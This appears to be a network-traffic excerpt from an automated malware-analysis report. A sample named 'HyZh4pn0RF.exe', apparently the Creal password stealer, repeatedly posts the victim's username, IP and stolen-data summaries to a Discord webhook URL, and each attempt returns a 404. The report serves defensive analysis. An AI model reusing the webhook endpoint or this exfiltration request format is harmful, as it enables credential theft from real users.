                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 42 6e 4e 36 45 2e 78 6f 43 79 43 6e 38 35 39 6f 65 59 79 47 73 75 44 48 4f 65 53 4c 79 6e 2e 6d 4c 52 76 78 37 75 64 4b 6a 75 6b 2d 31 37 32 37 34 35 33 39 33 30 30 32 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 36 34 66 37 61 34 32 35 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=BnN6E.xoCyCn859oeYyGsuDHOeSLyn.mLRvx7udKjuk-1727453930026-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfd64f7a425d-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                12192.168.2.849721162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC1341INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:50 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2e8e70147cec11efa1e1a6a6d338c935; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453932
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ui0h6LY2TA975PP8hrbL6Rn9ed5x4e4A%2F4iYiZNAZxOhND%2BBUzXoNM%2BqomWdmTF%2F0OzbxZnSaOsqZb%2FqL%2BlEfWU7OXyAYITzA7f7WHeod8vdS13GHA5tw4wVfA0L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2e8e70147cec11efa1e1a6a6d338c935d787564224f81a52ba35e29a80bd3a864c9f3775dde1657035d4b8bbe7a36439; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 72 52 55 58 43 73 36 62 54 71 36 45 44 62 47 34 4a 6d 31 50 67 6b 59 50 5a 4d 4f 42 66 39 48 35 55 33 69 4b 33 70 73 72 79 45 63 2d 31 37 32 37 34 35 33 39 33 30 37 31 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 61 33 63 66 39 38 63 36 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=rRUXCs6bTq6EDbG4Jm1PgkYPZMOBf9H5U3iK3psryEc-1727453930712-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfda3cf98c6c-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                13192.168.2.849722162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:50 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2e9d8b4e7cec11ef852fbe573e76249d; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 2
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453932
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0wrL88lead%2Fx6hy8klXu4pPvtZEpI%2F0pDKopLHw7GL6t456npHX5FKS22j%2Fn1G7kDjndp3k%2Fn8tw9CSDRAW5YKwd6MTMDvLkYb5mIMuFWbfrOOH%2FtntcWm5HgTF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2e9d8b4e7cec11ef852fbe573e76249d67437e93f77931898004f1f78a6698ac2ddbba2c8d61e800e8f47dcd5912d425; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 79 37 71 59 45 6b 66 65 62 30 51 44 79 68 64 4c 39 63 76 46 34 38 6a 49 68 4a 6c 57 48 54 6e 78 56 6a 33 67 6d 36 38 32 54 4a 67 2d 31 37 32 37 34 35 33 39 33 30 38 31 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 62 30 63 64 38 34 34 31 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=y7qYEkfeb0QDyhdL9cvF48jIhJlWHTnxVj3gm682TJg-1727453930811-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfdb0cd84414-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                14192.168.2.849724162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:51 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2ef510087cec11ef9c0d124b36f1d382; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453933
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oa0d3H%2B2YNBcftR3sjRCw%2FQB3NzMr0%2BeVBIlEkEODQGnMrwzoBzx7WtEGb26CEgkh0bCcwHPDczW5MHbCmM9HhP2eIBRk7Oj1zW3w%2B3Dg2yAN1KyrFnKIs5Qw9gW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2ef510087cec11ef9c0d124b36f1d3829bb0bb8cb584b865e3ac91dbc57d16d57a1b6b8c5f5ac0ee510533934fed87c6; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=b9abd809e0334626dff7c87e6434dc816a7033f1-1727453931; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 4b 4e 5f 4d 53 34 43 5f 5f 66 35 50 6d 71 41 67 6f 59 63 4a 54 32 4c 68 38 43 71 51 74 5f 6d 74 6f 77 65 38 43 64 5a 38 57 59 2d 31 37 32 37 34 35 33 39 33 31 33 38 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 65 61 38 33 33 34 31 63 36 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=QKN_MS4C__f5PmqAgoYcJT2Lh8CqQt_mtowe8CdZ8WY-1727453931384-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfdea83341c6-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                15192.168.2.849725162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:51 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2f047d047cec11ef85ed067ba21bebfe; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 2
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453933
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bxf253Q498%2FMMLryXIURf%2B7xKpYrAu88NpKMZTHnsiTA8b7tZYPo66pv%2B0cD8zA9TkbicREVvlXnoTvFNjya6MFVdkcjtFjlk%2Fruiz%2BKMvxtZYSzH59Nca222zzx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2f047d047cec11ef85ed067ba21bebfe0e5f5f20399985eeec12c0af5433f1f82f9e8a371b829c6091a4ab9a85478bd6; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=b9abd809e0334626dff7c87e6434dc816a7033f1-1727453931; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6f 4a 62 43 46 59 35 6c 6b 46 59 6e 34 73 6d 76 49 51 6d 6c 50 42 31 4a 50 53 70 48 38 30 56 45 65 4e 74 50 73 51 62 5f 62 6c 6b 2d 31 37 32 37 34 35 33 39 33 31 34 38 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 66 35 63 66 35 34 33 34 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=oJbCFY5lkFYn4smvIQmlPB1JPSpH80VEeNtPsQb_blk-1727453931486-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfdf5cf54344-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:51 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                16192.168.2.849727162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:52 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
